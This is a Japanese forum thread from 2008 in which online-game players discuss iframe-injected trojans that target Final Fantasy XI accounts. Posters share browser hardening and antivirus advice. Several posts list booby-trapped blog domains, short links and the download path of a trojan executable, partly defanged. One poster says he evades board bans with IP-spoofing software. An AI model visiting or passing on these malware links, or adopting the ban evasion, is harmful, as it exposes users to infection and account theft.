213 :既にその名前は使われています:2008/03/13(木) 20:57:59.48 ID:S3LphSTg
たまにRMT広告が強制的に掲載されるのが困りものだが
amebloに戻るかな…

214 :既にその名前は使われています:2008/03/13(木) 21:26:35.80 ID:DK6wU/Hs
外部のサイトを規制するんじゃなくて、某国もしくはユーザーが個別に設定した
プロバ以外のPOLへのアクセスを遮断してくれればいい

215 :既にその名前は使われています:2008/03/13(木) 21:36:41.83 ID:9VhF97La
今バスターつかってるんだけどカスペに乗り換えたほうが良い?

216 :既にその名前は使われています:2008/03/13(木) 21:51:01.14 ID:3opfrEel
>>215
ウイルス対策ソフトはクルマでいえばエアバッグみたいなもんだから
有名どころの製品を使っているならわざわざ買い換えることはないと思う。

自衛策として>>4-5をやって、さらに↓の実行を推奨。

・Real Playerがインストールされている場合は、アンインストールする
・IEやOperaでは、ブラウザの設定でiframeを無効にする
・Firefoxには拡張機能「Noscript」をインストールして、iframeが無効になるように設定
・Secunia PSIでインストール済みソフトに脆弱性が残っていないか確認
 引っかかったソフトはアップデートするかアンインストールする

Secunia PSIのダウンロードはここから。
ttps://psi.secunia.com/

217 :既にその名前は使われています:2008/03/13(木) 22:08:05.69 ID:Whai5j31
まだ被害に有ったことの無い俺がやっていること。
セキュリティソフトを入れる。(avastが無料なので使ってる)
ブラウザを火狐にする。
火狐の追加機能でNoscriptを入れる。
エロサイトを覗いた後はオンラインスキャン。

この前の香港女優おまんこ画像探しに香港のサイトかなり彷徨ってしまった。
ウイルス怖いと思いつつ無修正画像には飛びついてしまう男のsaga。
色々防御策は講じてるがいつかやられるだろう。

218 :既にその名前は使われています :2008/03/13(木) 22:14:53.83 ID:fNANyHE7
垢抜きやってる業者って
BANの報復も兼ねてやってるのかねぇ?

219 :既にその名前は使われています:2008/03/13(木) 22:27:20.66 ID:9VhF97La
>>216
なるほど、了解
ブラウザsleipnir使ってるんだけど
火狐じゃないと危ないかな?

220 :既にその名前は使われています:2008/03/13(木) 22:36:14.92 ID:3TWwQQa2
>>219
俺はプニルから狐に乗り換えた
ただプニルに慣れると使い勝手がやはり良くない

221 :既にその名前は使われています:2008/03/13(木) 23:21:02.48 ID:3opfrEel
>>219
今どきは「IEは危険でFirefoxやOperaは安全」ということはないかと。
ただ、IE6には>>65で紹介された脆弱性が見つかっているからIE7へのバージョンアップを
勧めたい。しかし、IE7は不安定だという人もいる。
SleipnirでGeckoを使うという手もあるけど、安全になるかどうかは……。

>>216一部訂正
IEは単体でiframeを無効にできないようだ。
[インターネットオプション]の[セキュリティ]で「IFRAMEのプログラムとファイルの起動」を
「無効にする」に設定してもiframeの中身が表示されるし、JavaScriptも動く。
デフォルト設定は「ダイアログを表示する」だけど、今まで表示された覚えないもんなあ。
これ、何を防ぐ設定なんだろう。ActiveX?

追加。IEの[インターネットオプション]で「拡張子ではなく、内容によってファイルを開く」は
「無効にする」推奨ね。

222 :既にその名前は使われています:2008/03/13(木) 23:48:13.20 ID:cebZ6MQn
IEのIFRAME自体の無効化はこれで出来ないものかね?

M'airsys.text IEでIFrameタグ自体を無効にする
ttp://blog.livedoor.jp/mairsys/archives/417867.html


223 :既にその名前は使われています:2008/03/13(木) 23:55:04.74 ID:3opfrEel
>>222 残念ながら。
スタイルシートで表示を消してもiframeの中身は取ってきた。
中身のJavaScriptも実行されてしまった。

224 :既にその名前は使われています:2008/03/14(金) 00:08:07.66 ID:X6poRpzt
>>223
そうか、それでもダメということは。
IEは特別な理由ない限り使わんのが一番ってこったな。

俺はIE使うのはActiveX使ったネトゲランチャー起動とか
IE以外だと何故か文字入力できないブログで日記書く位だけどもさ。


225 :既にその名前は使われています:2008/03/14(金) 00:23:33.24 ID:79QwqLyu
IEでインラインフレームを排除するにはページを書き換えられる
プロクシソフトを併用するしかないかもしれませんね
その手のローカルプロクシはProxomitronが有名かな

226 :既にその名前は使われています:2008/03/14(金) 00:26:55.55 ID:FvN/OLkb
>>214
>>外部のサイトを規制するんじゃなくて、某国もしくはユーザーが個別に設定した
>>プロバ以外のPOLへのアクセスを遮断してくれればいい

あまり意味ない
インターネットにIP偽装ソフトウェアがいっぱいあります
簡単に手に入れるし、使い勝手もかなり良い

ちなみに俺も2CHにアク規制を巻き込まれた
ただいまははIP偽装ソフトウェア使って書き込みます

227 :既にその名前は使われています:2008/03/14(金) 00:31:39.47 ID:NivMWxtv
>>226
日本語がお上手ですね^^

228 :226:2008/03/14(金) 00:38:05.67 ID:ycAyv2B4
× ただいまははIP偽装ソフトウェア使って書き込みます
○ ただいまはIP偽装ソフトウェア使って書き込んでいる

で、言いたいのは、語言別鯖云々もあまり意味ない
業者ならどうせIP偽装してアクセスしてくる
困るのは海外にいる良善プレイヤーだけ

>>227
はい、実は外人です
あと、IP変わった

229 :既にその名前は使われています:2008/03/14(金) 00:46:49.28 ID:3Iqhyue3
>>228
公式にサービス展開されてる国なら別に何も困らないと思いますよ。

230 :既にその名前は使われています:2008/03/14(金) 00:49:01.42 ID:ycAyv2B4
>>229
ありがとう
公式にサービス展開されてない弱小国家だから困っているw

231 :既にその名前は使われています:2008/03/14(金) 01:02:23.37 ID:79QwqLyu
罠サイトのためにドメイン名を400個も取得しまくる業者なら
日本国内に中継ノードを作るくらいは簡単だろうし、実際に
ほかのゲームではそれが発覚して事件になったよね

リネ2のセキュリティカードっていうのはワンタイムパスワードの
一種なのかな?
何年も前にOPIEを使ったことがあるんだけど、面倒なだけあって
ワンタイムパスワードはかなり安心

232 :既にその名前は使われています:2008/03/14(金) 01:04:25.45 ID:ycAyv2B4
ラストレス
別に煽りしてきたわけじゃない
垢ハック対策は全然意味ないって言いたくない
でも、インターネットってこんなもん

一番お勧め対策はやはりFF11専用機
FF11以外(のネット関連すること)は一切しないこと

これ以上は嫌われるかもしれない
では ノシ

233 :既にその名前は使われています:2008/03/14(金) 01:14:52.46 ID:79QwqLyu
>>232
うん、あなたが言うことは正しいと思った
嫌ったりはしないから、また遊びに来てね

234 :既にその名前は使われています:2008/03/14(金) 02:10:36.01 ID:VVgb5AcE
まあ、そこまで日本語で応対出来るなら、意味とかわかるでしょ。
それを命じた人間が1番悪いのは万国共通。

悪人は国を越えてでもつかまって欲しいもんです。

235 :既にその名前は使われています:2008/03/14(金) 03:54:42.41 ID:lPNrKKUP
あげ保守

236 :既にその名前は使われています:2008/03/14(金) 04:24:24.11 ID:KRRWZtvd
ちょっと面白いこと思った。
公式からリンクされてるコミュニティサイトにすらウィルス張られてたらどうなるかなww
さすがに無視できんだろうww

開発員のパスまで抜かれたらプギャ━━━━━━m9(^Д^)━━━━━━!!!!!!

237 :既にその名前は使われています:2008/03/14(金) 06:48:58.87 ID:fr0JfmS/
ミスラ臼魔道士奮闘記がいかにもウイルス仕込まれた感じになってるんだが
踏んじまったからパス変更してウイルススキャン中orz鬱だ・・・

放置系のブログは要注意だな。更新してると思って見るとこれだもんな
おまけにコメは認証だから他の閲覧者に注意を促すこともできん

238 :既にその名前は使われています:2008/03/14(金) 07:34:19.20 ID:ekUMLFdv
>>237
何もないぞ?

239 :既にその名前は使われています:2008/03/14(金) 08:19:52.10 ID:rcYssvy9
保守

240 :既にその名前は使われています:2008/03/14(金) 08:27:52.07 ID:rcYssvy9
[OGC2008#10]お金をかければよいわけではない?
その道のプロに聞く,オンラインゲームの不正アクセス対策
ttp://www.4gamer.net/games/000/G000000/20080314003/

↑主にユーザーがどうこうするじゃなく運営がなんかしろ、と言うスタンス

241 :既にその名前は使われています:2008/03/14(金) 08:40:38.62 ID:QSExmRrU
Webページ改竄の攻撃で1万ページ以上が被害に、米McAfeeが報告
http://internet.watch.impress.co.jp/cda/news/2008/03/13/18800.html

>米McAfeeは12日、WebサイトにJavaScriptを埋め込む大規模な攻撃が発生し、1万ページ以上が被害にあったと見られると、同社Avert Labsの公式ブログで伝えた。
(中略)
>McAfeeでは、この攻撃により1万ページ以上が被害にあったと見られ、ダウンロードされるトロイの木馬のうち1つは、オンラインゲーマーを対象にしたものだとしている。

242 :既にその名前は使われています:2008/03/14(金) 09:28:01.18 ID:ekUMLFdv
>>241
他板だけどageついでに。
http://enif.mmobbs.com/test/read.cgi/livero/1197889519/936-944

243 :既にその名前は使われています:2008/03/14(金) 09:37:29.37 ID:zMlfYuK6
>>220
俺もすレイプ似るから狐に移った組

最初は不便だったけど
マウスジェスチャ追加したら気にならなくなった

244 :既にその名前は使われています:2008/03/14(金) 10:07:13.93 ID:ekUMLFdv
Firefox3Beta4があまりに安定しておもしろくないので4Alphaにしてみた。
IE8BetaとSafari3Betaと併用してアカハック踏みまくり。

245 :既にその名前は使われています:2008/03/14(金) 11:22:13.31 ID:iLe2/sII
>>179
これは酷い…、ウィルス対策ソフトの公式ページがウィルスばら撒いてましたってか
損害賠償請求してもいいんじゃねえかなこれは。

246 :既にその名前は使われています:2008/03/14(金) 11:23:36.59 ID:ekUMLFdv
>>245
去年ESET(NOD32のとこ)もやらかした。

247 :既にその名前は使われています:2008/03/14(金) 11:42:09.77 ID:ekUMLFdv
さぞ祭りになっているだろうとセキュ板行ったら
ウイルスブースターとか呼ばれてて笑っちまったw

248 :既にその名前は使われています:2008/03/14(金) 12:36:17.51 ID:rcYssvy9
保守

249 :既にその名前は使われています:2008/03/14(金) 12:45:02.57 ID:e/BiOJZS
今回のは大規模だな
ネトゲのアカ狙いでここまでやるとは^^;

250 :既にその名前は使われています:2008/03/14(金) 12:50:22.01 ID:K1DaCbz8
・金になる
・検挙されない
・検挙にいたるようになるまでかなーーーーーり時間がかかる
・やるだけやって逃げる余裕がたっぷりある

こんなトコかな?

251 :既にその名前は使われています:2008/03/14(金) 12:53:15.88 ID:rcYssvy9
リスク少なくて金になるからなー

252 :既にその名前は使われています:2008/03/14(金) 13:28:42.08 ID:xVWWIBAP
国自体が守ってるからな
あと軍備も拡大中で色々危険な国ではある

253 :既にその名前は使われています:2008/03/14(金) 13:33:56.99 ID:K1DaCbz8
ただ、あの国の事だから
“サイバーテロ国家じゃないなら犯人出しやがれ”ってやられたら
“犯人はこいつ等です、国家とかカンケーないです、もう処刑しましたw”
ってやっちゃう国でもある

254 :既にその名前は使われています:2008/03/14(金) 14:02:27.74 ID:X6poRpzt
最近また短縮URL使い出したから気をつけてくれよな!

罠コメのリンクと罠ブログ(通報で消去済み)のIFRAMEに仕込まれていた。
*罠コメ
FF11磔因」ャケ・ツヤ」ャリ怏モ」ャBBS」ャホ菷?タセ゚ムuラ
URL:。。http://tinyurl■com/3xrz52
FF11ケォハス・レゥ`・ク。」FF11磔因 ・ケ・ッ・・`・?キ・逾テ・ネ」ャ・メ・?ヌ・゚・テ・ネ・オゥ`・ミゥ`ヒ??ホ・ノ・・`・ユ、ヒ、隍・菷?「キタセ゚ムuラ?FF11モ嶐゚ FF11ケ・ツヤ FF11リ


http://www■soracger■com/wiki/
2008/03/14(金) 12:54 | URL | 娼鯖祥窟 #-[ 編集

ttp://tinyurl■com/3xrz52

続く

255 :既にその名前は使われています:2008/03/14(金) 14:03:08.76 ID:X6poRpzt
続き

*罠ブログ
fgvcdy6hgbu854.blog10■fc2■com/

サイズ0で仕込まれているもの
tinyurl■com/2lzn6h
soracger■com

判らんのが短縮の飛び先がどっちもペイパルってこと、罠ブログにはサイズ0で仕込んでいたことでなおわけ判らん。
まさか、ね。

256 :既にその名前は使われています:2008/03/14(金) 14:07:41.75 ID:MBobY2Ir
罠コメといえば学者関係の記事に

お久し振りです(●'-')
新ジョブ・・興味はあるものの、私もまだまだやらなきゃいけない事いぱーいなので、手を付ける予定はありません(/ω\*)
でも、学者サンのAF着てみたいなぁ〜

のコメがやたら張られてるね。普通のコメントからのコピペだろうけど。【気をつけてください】

257 :既にその名前は使われています:2008/03/14(金) 14:17:04.33 ID:ekUMLFdv
よくわからんので踏んでみた。
>>254
tinyurl■com/3xrz52
→www■homepuon■net/blog/
>>255
そのブログはiframeが3匹いる。
www■soracger■com/blog/
(widthの前にスペースが入っていなくて/blog/widthとなって404になって失敗する)
tinyurl■com/2lzn6h
→www■soracger■com/blog/
(上記を反省して短縮URIにしてみました)
www■gamtyblog■net/wiki/
(鶏頭なので同じホストをもう1匹仕込んじゃいました)
>飛び先がどっちもペイパル
(゚д゚)…

258 :既にその名前は使われています:2008/03/14(金) 14:23:59.74 ID:X6poRpzt
>>飛び先がどっちもペイパル
>(゚д゚)…

ソースチェッカーオンラインで件の短縮調べてるとこうでるのよ。
その場でソースではなくロケーションヘッダ追ってると、ね。
※ フォームタグを発見しました。(1)
https://www■paypal■com/cgi-bin/webscr



259 :既にその名前は使われています:2008/03/14(金) 14:28:34.62 ID:e/BiOJZS
>>258
Tinyurlのプレビュー機能をONにしてると
リダイレクト確認ページが表示される

そこにもともとPaypalへのリンクがあるみたい

260 :既にその名前は使われています:2008/03/14(金) 14:30:10.45 ID:79QwqLyu
>>258
tinyurlのプレビュー画面にあるpaypalで寄付してねフォームみたい
なんでプレビューが有効になってるんだろうという疑問は残りますが

261 :既にその名前は使われています:2008/03/14(金) 14:32:49.44 ID:e/BiOJZS
かぶったな
プレビューデフォに仕様変更したのかな

262 :既にその名前は使われています:2008/03/14(金) 14:34:26.36 ID:ekUMLFdv
>>258
そのソースチェッカーで右のソース見るとさらにformにpostしてるっしょ。
hiddenでごちゃごちゃ暗号化してある部分が
サーバ内で持ってる飛び先と紐付けされていて
見ただけじゃ飛び先わからんようになってるんじゃないかな。

263 :既にその名前は使われています:2008/03/14(金) 14:35:59.21 ID:X6poRpzt
短縮は調べんの失敗だったか、反省。
しかし短縮併用でステルスを仕込む数が増えてきているので注意だな。


話は代わりFC2罠ブログ今日見つけて通報したのだけで4つ。
他のブログサービスと合わせて毎日作っているな、こりゃ。
地元で広告でも打ってんのかもしれんね。
FC2にアカウントを作るといくら、とかさ。


あと今朝ライブドアWikiの方にもIDを2つ作って罠Wiki構築してるのも確認。
リンク先は言うまでもなくFC2なんで通報して消滅。
それらもステルス短縮+罠ドメの混合IFRAMEトラップだった。

FFカテなのにリネWiki。
こっちは厄介だけどな、罠Wiki消しても罠ブログが作れるからな。
利用規約に欠陥があるし。
”違反行為をしないものとします”以下何もなし。


264 :既にその名前は使われています:2008/03/14(金) 14:38:13.38 ID:79QwqLyu
リロードしてなかたorz
>>261
ソースチェッカーオンラインがプレビューONのcookie食べてる
ようですね

265 :既にその名前は使われています:2008/03/14(金) 14:41:09.86 ID:ekUMLFdv
>>263
サーパラも負けてないぞ。
通報した罠ブログの数としてはFC2とあまり変わらないんだけど
利用者数が少ないので罠ブログの割合としては恐ろしく高い。

利用者数が少ないから
ttp://blog.surpara.com/blogList.html
で1日分全部チェックしても大した手間じゃなかったりする。
テンプレデフォで中身スッカスカなのは後日仕込むために
アカだけ大量に取ってるのかもしれん。

266 :既にその名前は使われています:2008/03/14(金) 14:46:03.50 ID:ekUMLFdv
続き
www■soracger■com/blog/
www■gamtyblog■net/wiki/
www■homepuon■net/blog/
↓iframe
www■caremoon■net/wiki/main.htm
↓MS06-014スクリプト
www■soracger■com/wiki/admin.exe
8日製造。既に監視中のトロイだった。

267 :既にその名前は使われています:2008/03/14(金) 14:49:04.01 ID:ekUMLFdv
すまん
ttp://blog.surpara.com/blogList.html
調子悪そうだ。新着日がメンテか何かの日時になってあてにならん
(普通なら新着は日に10件も無い)。
というか個別に飛ぶと403なのでサーパラブログそのものが調子悪いのかも。

268 :既にその名前は使われています:2008/03/14(金) 14:54:49.67 ID:79QwqLyu
>>267
そのページの右上にあるボタン「SURAPARA」になってる
そういう名前のサービスもある? ミス?

悪用されるサービスが増えて、ブラックリストの管理が
面倒になってきたー

269 :既にその名前は使われています:2008/03/14(金) 14:55:57.01 ID:ekUMLFdv
>>268
おお…よく気がついたね!
次の通報の時に言ってみるw

270 :既にその名前は使われています:2008/03/14(金) 15:07:30.33 ID:ekUMLFdv
続き
admin.exe、どんなんだか忘れたので拾いなおしてみた。
200kB近い(アカハックにしては)巨大なサイズは
自己解凍cabのため。
2匹入っていて片方はff11.exeというアレな感じのファイル。
たぶん数社に提出したと思う。

271 :既にその名前は使われています:2008/03/14(金) 15:48:05.96 ID:nOgQKZ6q
あげ

272 :既にその名前は使われています:2008/03/14(金) 15:52:29.78 ID:k5TGyDU9
初心者質問ですまんのだが
iframeっていうのはテンプレじゃなく
記事本文のどっかを改竄されて仕掛けられたりする可能性はある?
ちなみにFC2ブログ利用者です('A`)

273 :既にその名前は使われています:2008/03/14(金) 16:20:36.90 ID:YYQMZCbq
話題のiframeについて記事読んでみたけれど
親元が提供しているHTML文に中華がハックして
ウイルス埋め込んでたんだな。
普通のブログ開いたら、もれなく罠サイトも開くって仕組みか。

274 :既にその名前は使われています:2008/03/14(金) 16:43:03.95 ID:X6poRpzt
>>272
FC2ブログで過去に乗っ取りでリンク部分を罠に変えられたとかIFRAME仕込まれた事例はある
リネ資料室に出ている”ごま醤油日記サイト”とあとはどこだった失念。

ttp://lineage.nyx.bne.jp/misc/security/id_virus-site.html#GOMA
ごま醤油は2回やられたと言うから中華に一度目を付けられたが最後って奴だな。
罠コメとか解析に中華反応があったら以後頻繁にパスを変えないと危険。


275 :既にその名前は使われています:2008/03/14(金) 16:43:37.10 ID:ekUMLFdv
>>272
ブログのアカウント情報が漏れたことで書き換えられたのなら当然考えられる。
テンプレに仕込むほうが気づかれにくいし効果的だからやらんだろうけど。

276 :既にその名前は使われています:2008/03/14(金) 17:35:02.27 ID:ekUMLFdv
iframe src=罠 ばかり話題になっちゃったけど
script src=罠 も注意ね。
ブログで使えるかどうかは知らないけど。

277 :既にその名前は使われています:2008/03/14(金) 19:32:10.96 ID:Ze6Hci+A
すみません。
先ほどカスペルスキーオンラインウィルススキャンをしたら
「Trojan-Dropper.Win32.Agent.fwa」というトロイが検出されたのですが、
これがどういう物かわかる方おられないでしょうか・・・?
今週に入ってから何度かスキャンしても何も検出されなかったのに今日に
なって突然検出されたのでかなり焦ってます・・・。
ネットも特にやっていなかったので原因が全くわかりません。
カスペのウィルス辞典にもないしググっても全くなにもわからないのですが、
これってもしかして誤検出なんでしょうか?
ちなみにマカフィーでスキャンしたら何も検出されませんでした。
わかる方どうかお願いしますm(__)m
長文失礼致しました。

278 :既にその名前は使われています:2008/03/14(金) 19:34:40.94 ID:ZYDFUXwp
>>277
http://www.f-secure.co.jp/v-descs/v-descs3/small_wy.htm

279 :既にその名前は使われています:2008/03/14(金) 19:40:07.54 ID:G21LsoIM
>>277
オンラインスキャンしたなら結果保存して、どのファイルがそれに該当するかも書いてほしい
誤検知の可能性もあるがファイルがわからないと何ともいいにくい

まあマジ物ならカスペの試用版で削除できるが

280 :既にその名前は使われています:2008/03/14(金) 19:47:41.98 ID:Ze6Hci+A
>>279
どう書いていいのかよくわからなくて申しわけないのですが、
感染していたのは
C:\Documents and Settings\All Users\Application Data\
 SingleClick Systems\HomeNet Manager\Intro\intro.exe と、
C:\Program Files\Dell Network Assistant\Intro\intro.exe
の二つのファイルでした。二つとも同じフォルダの他のファイルは
「ロックされています」という結果がでていたのですが
この二つだけが「Trojan-Dropper.Win32.Agent.fwa」に感染しています。
とでてくるんです・・・orz


281 :既にその名前は使われています:2008/03/14(金) 20:12:01.42 ID:ekUMLFdv
オンラインスキャナでは検知のみで駆除はしない。
体験版でも入れて駆除し、その後に製品版の購入を検討せよ。

282 :272:2008/03/14(金) 20:30:54.11 ID:k5TGyDU9
可能性としてはなくはないんだな…。
そかーありがとう。
最新記事ならともかく古い記事の本文とか改竄されたら
気付かなそうだなーと思ってさ。

>script src=罠 も注意ね。

こっちも引き続き気を付けたほうがいいんだな…
ありがとう。

283 :既にその名前は使われています:2008/03/14(金) 21:32:28.53 ID:2j1A/4JL
ぺってんのサイト、まだ危ないの?

284 :既にその名前は使われています:2008/03/14(金) 21:51:59.08 ID:ekUMLFdv
今は大丈夫だよ。将来は保障しないけど。

285 :既にその名前は使われています:2008/03/14(金) 22:19:25.16 ID:VVgb5AcE
危ない=行かなければどうという事は無い。という人間には、
「今はネットが危ないから、ネットに繋げない方がいいよ」と教えてあげればいいじゃないか。

286 :既にその名前は使われています:2008/03/14(金) 22:35:55.53 ID:L+s1xdAL
いつも勉強させて貰っています。質問すいませんです。
FirefoxにNoscript入れたんですが、設定での全般とインターフェイスの項目の
全てのjavascriptを許可のチェックを外しでおkですか?
それとPlugins設定でIFREM禁止にチェックでおkでしょうか?

Noscript入れたら更新する時に一瞬画面が黒くなるのですが仕様です?

287 :既にその名前は使われています:2008/03/14(金) 22:44:18.59 ID:3Iqhyue3
>>286
そこまでいくとセキュリティ関係の板で聞いた方がいいかも

288 :既にその名前は使われています:2008/03/14(金) 22:46:01.36 ID:2ghMhlAd
>>286
ググっても分からなかった?

ちなみに画面が黒くなるのは俺も

289 :既にその名前は使われています:2008/03/14(金) 22:50:16.61 ID:L+s1xdAL
素早いレスありがとうございます。
暗転は仕様ぽいみたいで安心しましたw
PluginsでIFREM禁止でいいのかが気になります

290 :既にその名前は使われています:2008/03/14(金) 22:51:07.13 ID:ekUMLFdv
R-TYPEでも出てきそうな名前だな

291 :既にその名前は使われています:2008/03/14(金) 23:15:31.90 ID:zmgD3HHB
注意喚起age

292 :既にその名前は使われています:2008/03/14(金) 23:27:40.81 ID:LWnZVWDZ
Avast!のページにAdministratorsにしたままだとヤバスってあったから
PowerUserにしたらPG2とかPSIが起動できません!て怒ってきた

どっちにすればいいんだ(´・ω・`)

293 :既にその名前は使われています:2008/03/15(土) 01:45:52.19 ID:FQ5tI1Fk
おやすみ上げ
>>292
adminでPG2を立ち上げておいた方が、垢ハックに関しては安全だろうな

294 :既にその名前は使われています:2008/03/15(土) 02:13:50.86 ID:j5yWfBJ0
>>289
はい。Pluginsタブの「<IFRAME>の禁止」にチェックでインラインフレームを禁止できます。

295 :既にその名前は使われています:2008/03/15(土) 02:15:29.78 ID:CgPw82vE
話題にでないけど、kingsoftのフリーのはどうなの?

みんな中国のだから敬遠してるだけ?

これ以外のフリーで、ネトゲしてても重くないのってどういうのがあるの?

296 :既にその名前は使われています:2008/03/15(土) 02:53:28.75 ID:4vM5gly/
>>295
釣り?w
Kingは論外

297 :既にその名前は使われています:2008/03/15(土) 02:54:13.21 ID:lDhxxzGq
漏れの観点では、
キングとソースは、例え無料だとしても
候補に上がらないレベル

298 :既にその名前は使われています:2008/03/15(土) 03:41:13.35 ID:r1JgwSgx
エレメンからWikiに飛んだら白いページに飛ばされたんだが・・

299 :既にその名前は使われています:2008/03/15(土) 04:55:15.93 ID:6V3s8o7M
とりあえず無料のVMwarePlayerいれとけ。
で、仮想環境でネット汁。ブックマークはどこかwebサービス経由させて移植すればいい。
windowsのライセンス一個なんてハックされるのと比べたら安いもんだ。
toolsも入れたら超便利だぜ

300 :既にその名前は使われています:2008/03/15(土) 05:35:32.61 ID:wxfd3WkK
>>298
それっていつ、どこのwikiで?

FINAL FANTASY XI Wikiなら一昨日当たり
一部のページが壊れて真っ白になってたらしいよ。

301 :既にその名前は使われています:2008/03/15(土) 07:59:38.44 ID:M1DiBH3o
保守

302 :既にその名前は使われています:2008/03/15(土) 10:39:05.19 ID:Qtbh2Ozf
KIS!
KIS!
KISはKin・・・Kaspersky^^;

303 :既にその名前は使われています:2008/03/15(土) 12:15:35.37 ID:0RLc2BGd
ZoneAlarmのファイアオールソフトでオンライン詐欺保護(登録したパスが送信されそうになると警告)
ってのがあるけど
これにPOLパスワードを入力して、POLパスは毎回入力にして
そうしたら防げないかな?逆にPCにパス入れてることになるから危険?


304 :既にその名前は使われています:2008/03/15(土) 12:30:01.31 ID:FQ5tI1Fk
被害者が個別スレを建ててしまったようなので上げとく

305 :既にその名前は使われています:2008/03/15(土) 12:37:03.28 ID:M1DiBH3o
>>303
どっちもどっち、キーロガーだって有るッしょ?

でもパスワード変更は頻繁にやった方が良いかもね。
垢ハックされた時、何年も変えてませんとか言ったら
それを理由に通常得られる保証を得られないかもしれない。

そんなに怖いならPS2(3)に乗り換えてからパス変えて
それまで使っていたPCはHDDフォーマットしてFF11入れなければいいよ。

306 :既にその名前は使われています:2008/03/15(土) 12:49:09.57 ID:D9+xAtmq
>>304
その個別スレに付いてるレスを見る限り
まだまだ被害者に留まらず、現況を知らずな人が多い感じだなぁ

307 :既にその名前は使われています:2008/03/15(土) 13:29:31.87 ID:FQ5tI1Fk
こんなに続いてるスレなのに知名度が低いことがよく分かるw
皆テンプレくらい見てほしいなぁ

308 :既にその名前は使われています:2008/03/15(土) 13:31:23.66 ID:mzDAnimW
まったくだねw
もう向こう300超えちまったw

309 :既にその名前は使われています:2008/03/15(土) 14:15:02.81 ID:XD+Rz95R
このお祭り騒ぎがいい方向に作用すればいいんだけどな

310 :既にその名前は使われています:2008/03/15(土) 14:43:01.92 ID:V3E9/m3R
ひとまずキャラ隔離来た

311 :既にその名前は使われています:2008/03/15(土) 14:48:51.00 ID:FQ5tI1Fk
あれだけ盛り上げてもらってある意味うらやましいなw
ここに報告した被害者も皆同じ道を通ってるのに

312 :既にその名前は使われています:2008/03/15(土) 14:49:52.25 ID:88lC05aF
鹿料理ランチレストランの事が新聞に載りました。
://hokkaido-np■blog■drecom■jp/

ヴァナモンブログに貼り付けられていたスパム。
ソースチャッカーオンラインでiframe有りと出た。
iframeで表示されるサイトは中国福建省竜岩(longyan)のもの。
サイトの所在地が竜岩な時点で黒でござろう。
おそらくウイルス自体は既存のものと予想する。

313 :既にその名前は使われています:2008/03/15(土) 14:57:19.61 ID:WZXVrvbx
あっちのスレ、リアルタイムでやってるってのが大きいんだろうな・・・

314 :既にその名前は使われています:2008/03/15(土) 14:59:53.60 ID:TQiaCE/W
個別スレでスレタイがめちゃめちゃわかりやすいしねw

315 :既にその名前は使われています:2008/03/15(土) 15:00:39.74 ID:mzDAnimW
あぁ、それがあるか。しかも休日だし

316 :既にその名前は使われています:2008/03/15(土) 15:06:55.91 ID:XD+Rz95R
あの被害者の件が落ち着いたのは何よりだが
「ハックされたらスレをたてて実況しながらレジコ乞食すれば良い」みたいな
変な認識が産まれたら困るな

317 :既にその名前は使われています:2008/03/15(土) 15:08:49.79 ID:H6xOjzpE
方々からプレゼントも来そうだ

318 :既にその名前は使われています:2008/03/15(土) 15:10:37.09 ID:TQiaCE/W
>>316
でも似たような感じで垢買いってバレてフルボッコになったのもあったしw
スレたててやる方も疑われること前提でやる覚悟いるかとw

319 :既にその名前は使われています:2008/03/15(土) 15:15:29.99 ID:hiN6ZFhA
いい方向にいきゃいいが、ヘンに□e叩きに走らないいが。
業者より□eの方が叩きやすい位置にいるからな。

320 :既にその名前は使われています:2008/03/15(土) 15:24:47.67 ID:D9+xAtmq
要は、本当に自衛する気があって未然に知る努力をするかしないかだなぁとおもた
あっちのスレの知らないゆえの無知識さぶりに
まだまだ垢ハック被害は終わらないだろうと核心した

321 :既にその名前は使われています:2008/03/15(土) 15:41:26.06 ID:1ztAgSot
結局今流行のiframeのウィルスはどうすれば防げるんだ?
ブラウザ火狐にしてiframe無効&Realplayerアンインスコでいいのだろうか?


Realのコーデック入れて大丈夫だよね?

322 :既にその名前は使われています:2008/03/15(土) 15:45:31.08 ID:9UGVJMjR
おいこのスレはやすぎ

323 :既にその名前は使われています:2008/03/15(土) 15:47:15.88 ID:9UGVJMjR
realプレイヤーは使ってると勝手に動画や音楽ファイルの関連付けをrealに変えるから
イライラしてアンインスコしたっけ。realじゃないと観れないお気に入りエロ動画も
あったが、uzeeeeeeので仕方ない。

324 :既にその名前は使われています:2008/03/15(土) 16:01:15.40 ID:JCCtbPTG
コーデック入れてGOMプレイヤー使えよw


あとはぐぐれ

325 :既にその名前は使われています:2008/03/15(土) 16:05:00.42 ID:1ztAgSot
>>324
おっけーー!それが聞きたかったんだ  マジでサンクス。

326 :既にその名前は使われています:2008/03/15(土) 16:05:10.60 ID:IO6YvPGZ
>>321
iframeを仕込む手口だけならIframe無効化でOKだが
SCRIPTを仕込んだりと手口を代えてくる可能性はある。

RealPlayerの脆弱性だけじゃなくADODBの脆弱性やらExcelの脆弱性やらいろいろ
ついてくるのでRealPlayerのアンインスコだけでは安心はできない。
WindowsUpdateいやさMicrosoftUpdateでOfficeも含めてUpdateすべきか。

327 :既にその名前は使われています:2008/03/15(土) 16:28:23.41 ID:Sc3cVJvp
今時Realプレイヤーとか必要無いしな

328 :既にその名前は使われています:2008/03/15(土) 16:30:19.91 ID:wi4xW8t0
とうとうネ実にも罠URLつきスレたてがはじまったなw

忍ソロ記事メインのブログです
FF11ギル RMT 好評につき大幅値下げいたしました

の2つのスレをとりあえず確認
URLは割愛

329 :既にその名前は使われています:2008/03/15(土) 16:33:01.28 ID:j5yWfBJ0
Micorosoft Updateで更新できるのはOffice 2003以降のみ
Office 2000以前を使っている場合はOffice Updateを手動でやらないと

各種アップデートを済ませたあとでSecuniaのPSIで調べときー
PSIが最新版だとレポートしてもReal Playerはアンインストール

330 :既にその名前は使われています:2008/03/15(土) 17:23:18.28 ID:7SuVNF8h
>>294
ただいま帰宅す。やはりそれでおkですね。安心しました、ありがとうです。

Noscript紹介してくれた方にも改めて御礼します。
更新時の一瞬の暗転画面は如何なる仕業なんでしょうかね?ちょっと怖いので気になるのです;;

331 :既にその名前は使われています:2008/03/15(土) 17:51:51.19 ID:Q1L8MLpo
>>330
板違いだからソフトウェア板で聞いてくれ。
あらかじめ言っておくがFirefoxスレと
Firefox質問スレとFirefox拡張スレは別だからな。

332 :既にその名前は使われています:2008/03/15(土) 18:26:50.05 ID:C2cVupHk
質問

パソコン(昨年10月にインスコして一回のみイン)とPS2(メイン)でやってます。
この度、パソコンからアンインストールしようと思うんですが、
アンインストールすれば、アカウントやパスワードの情報が無くなりますか?
OSの再インストールしないとダメ?

333 :既にその名前は使われています:2008/03/15(土) 18:33:45.52 ID:Ks96FlUy
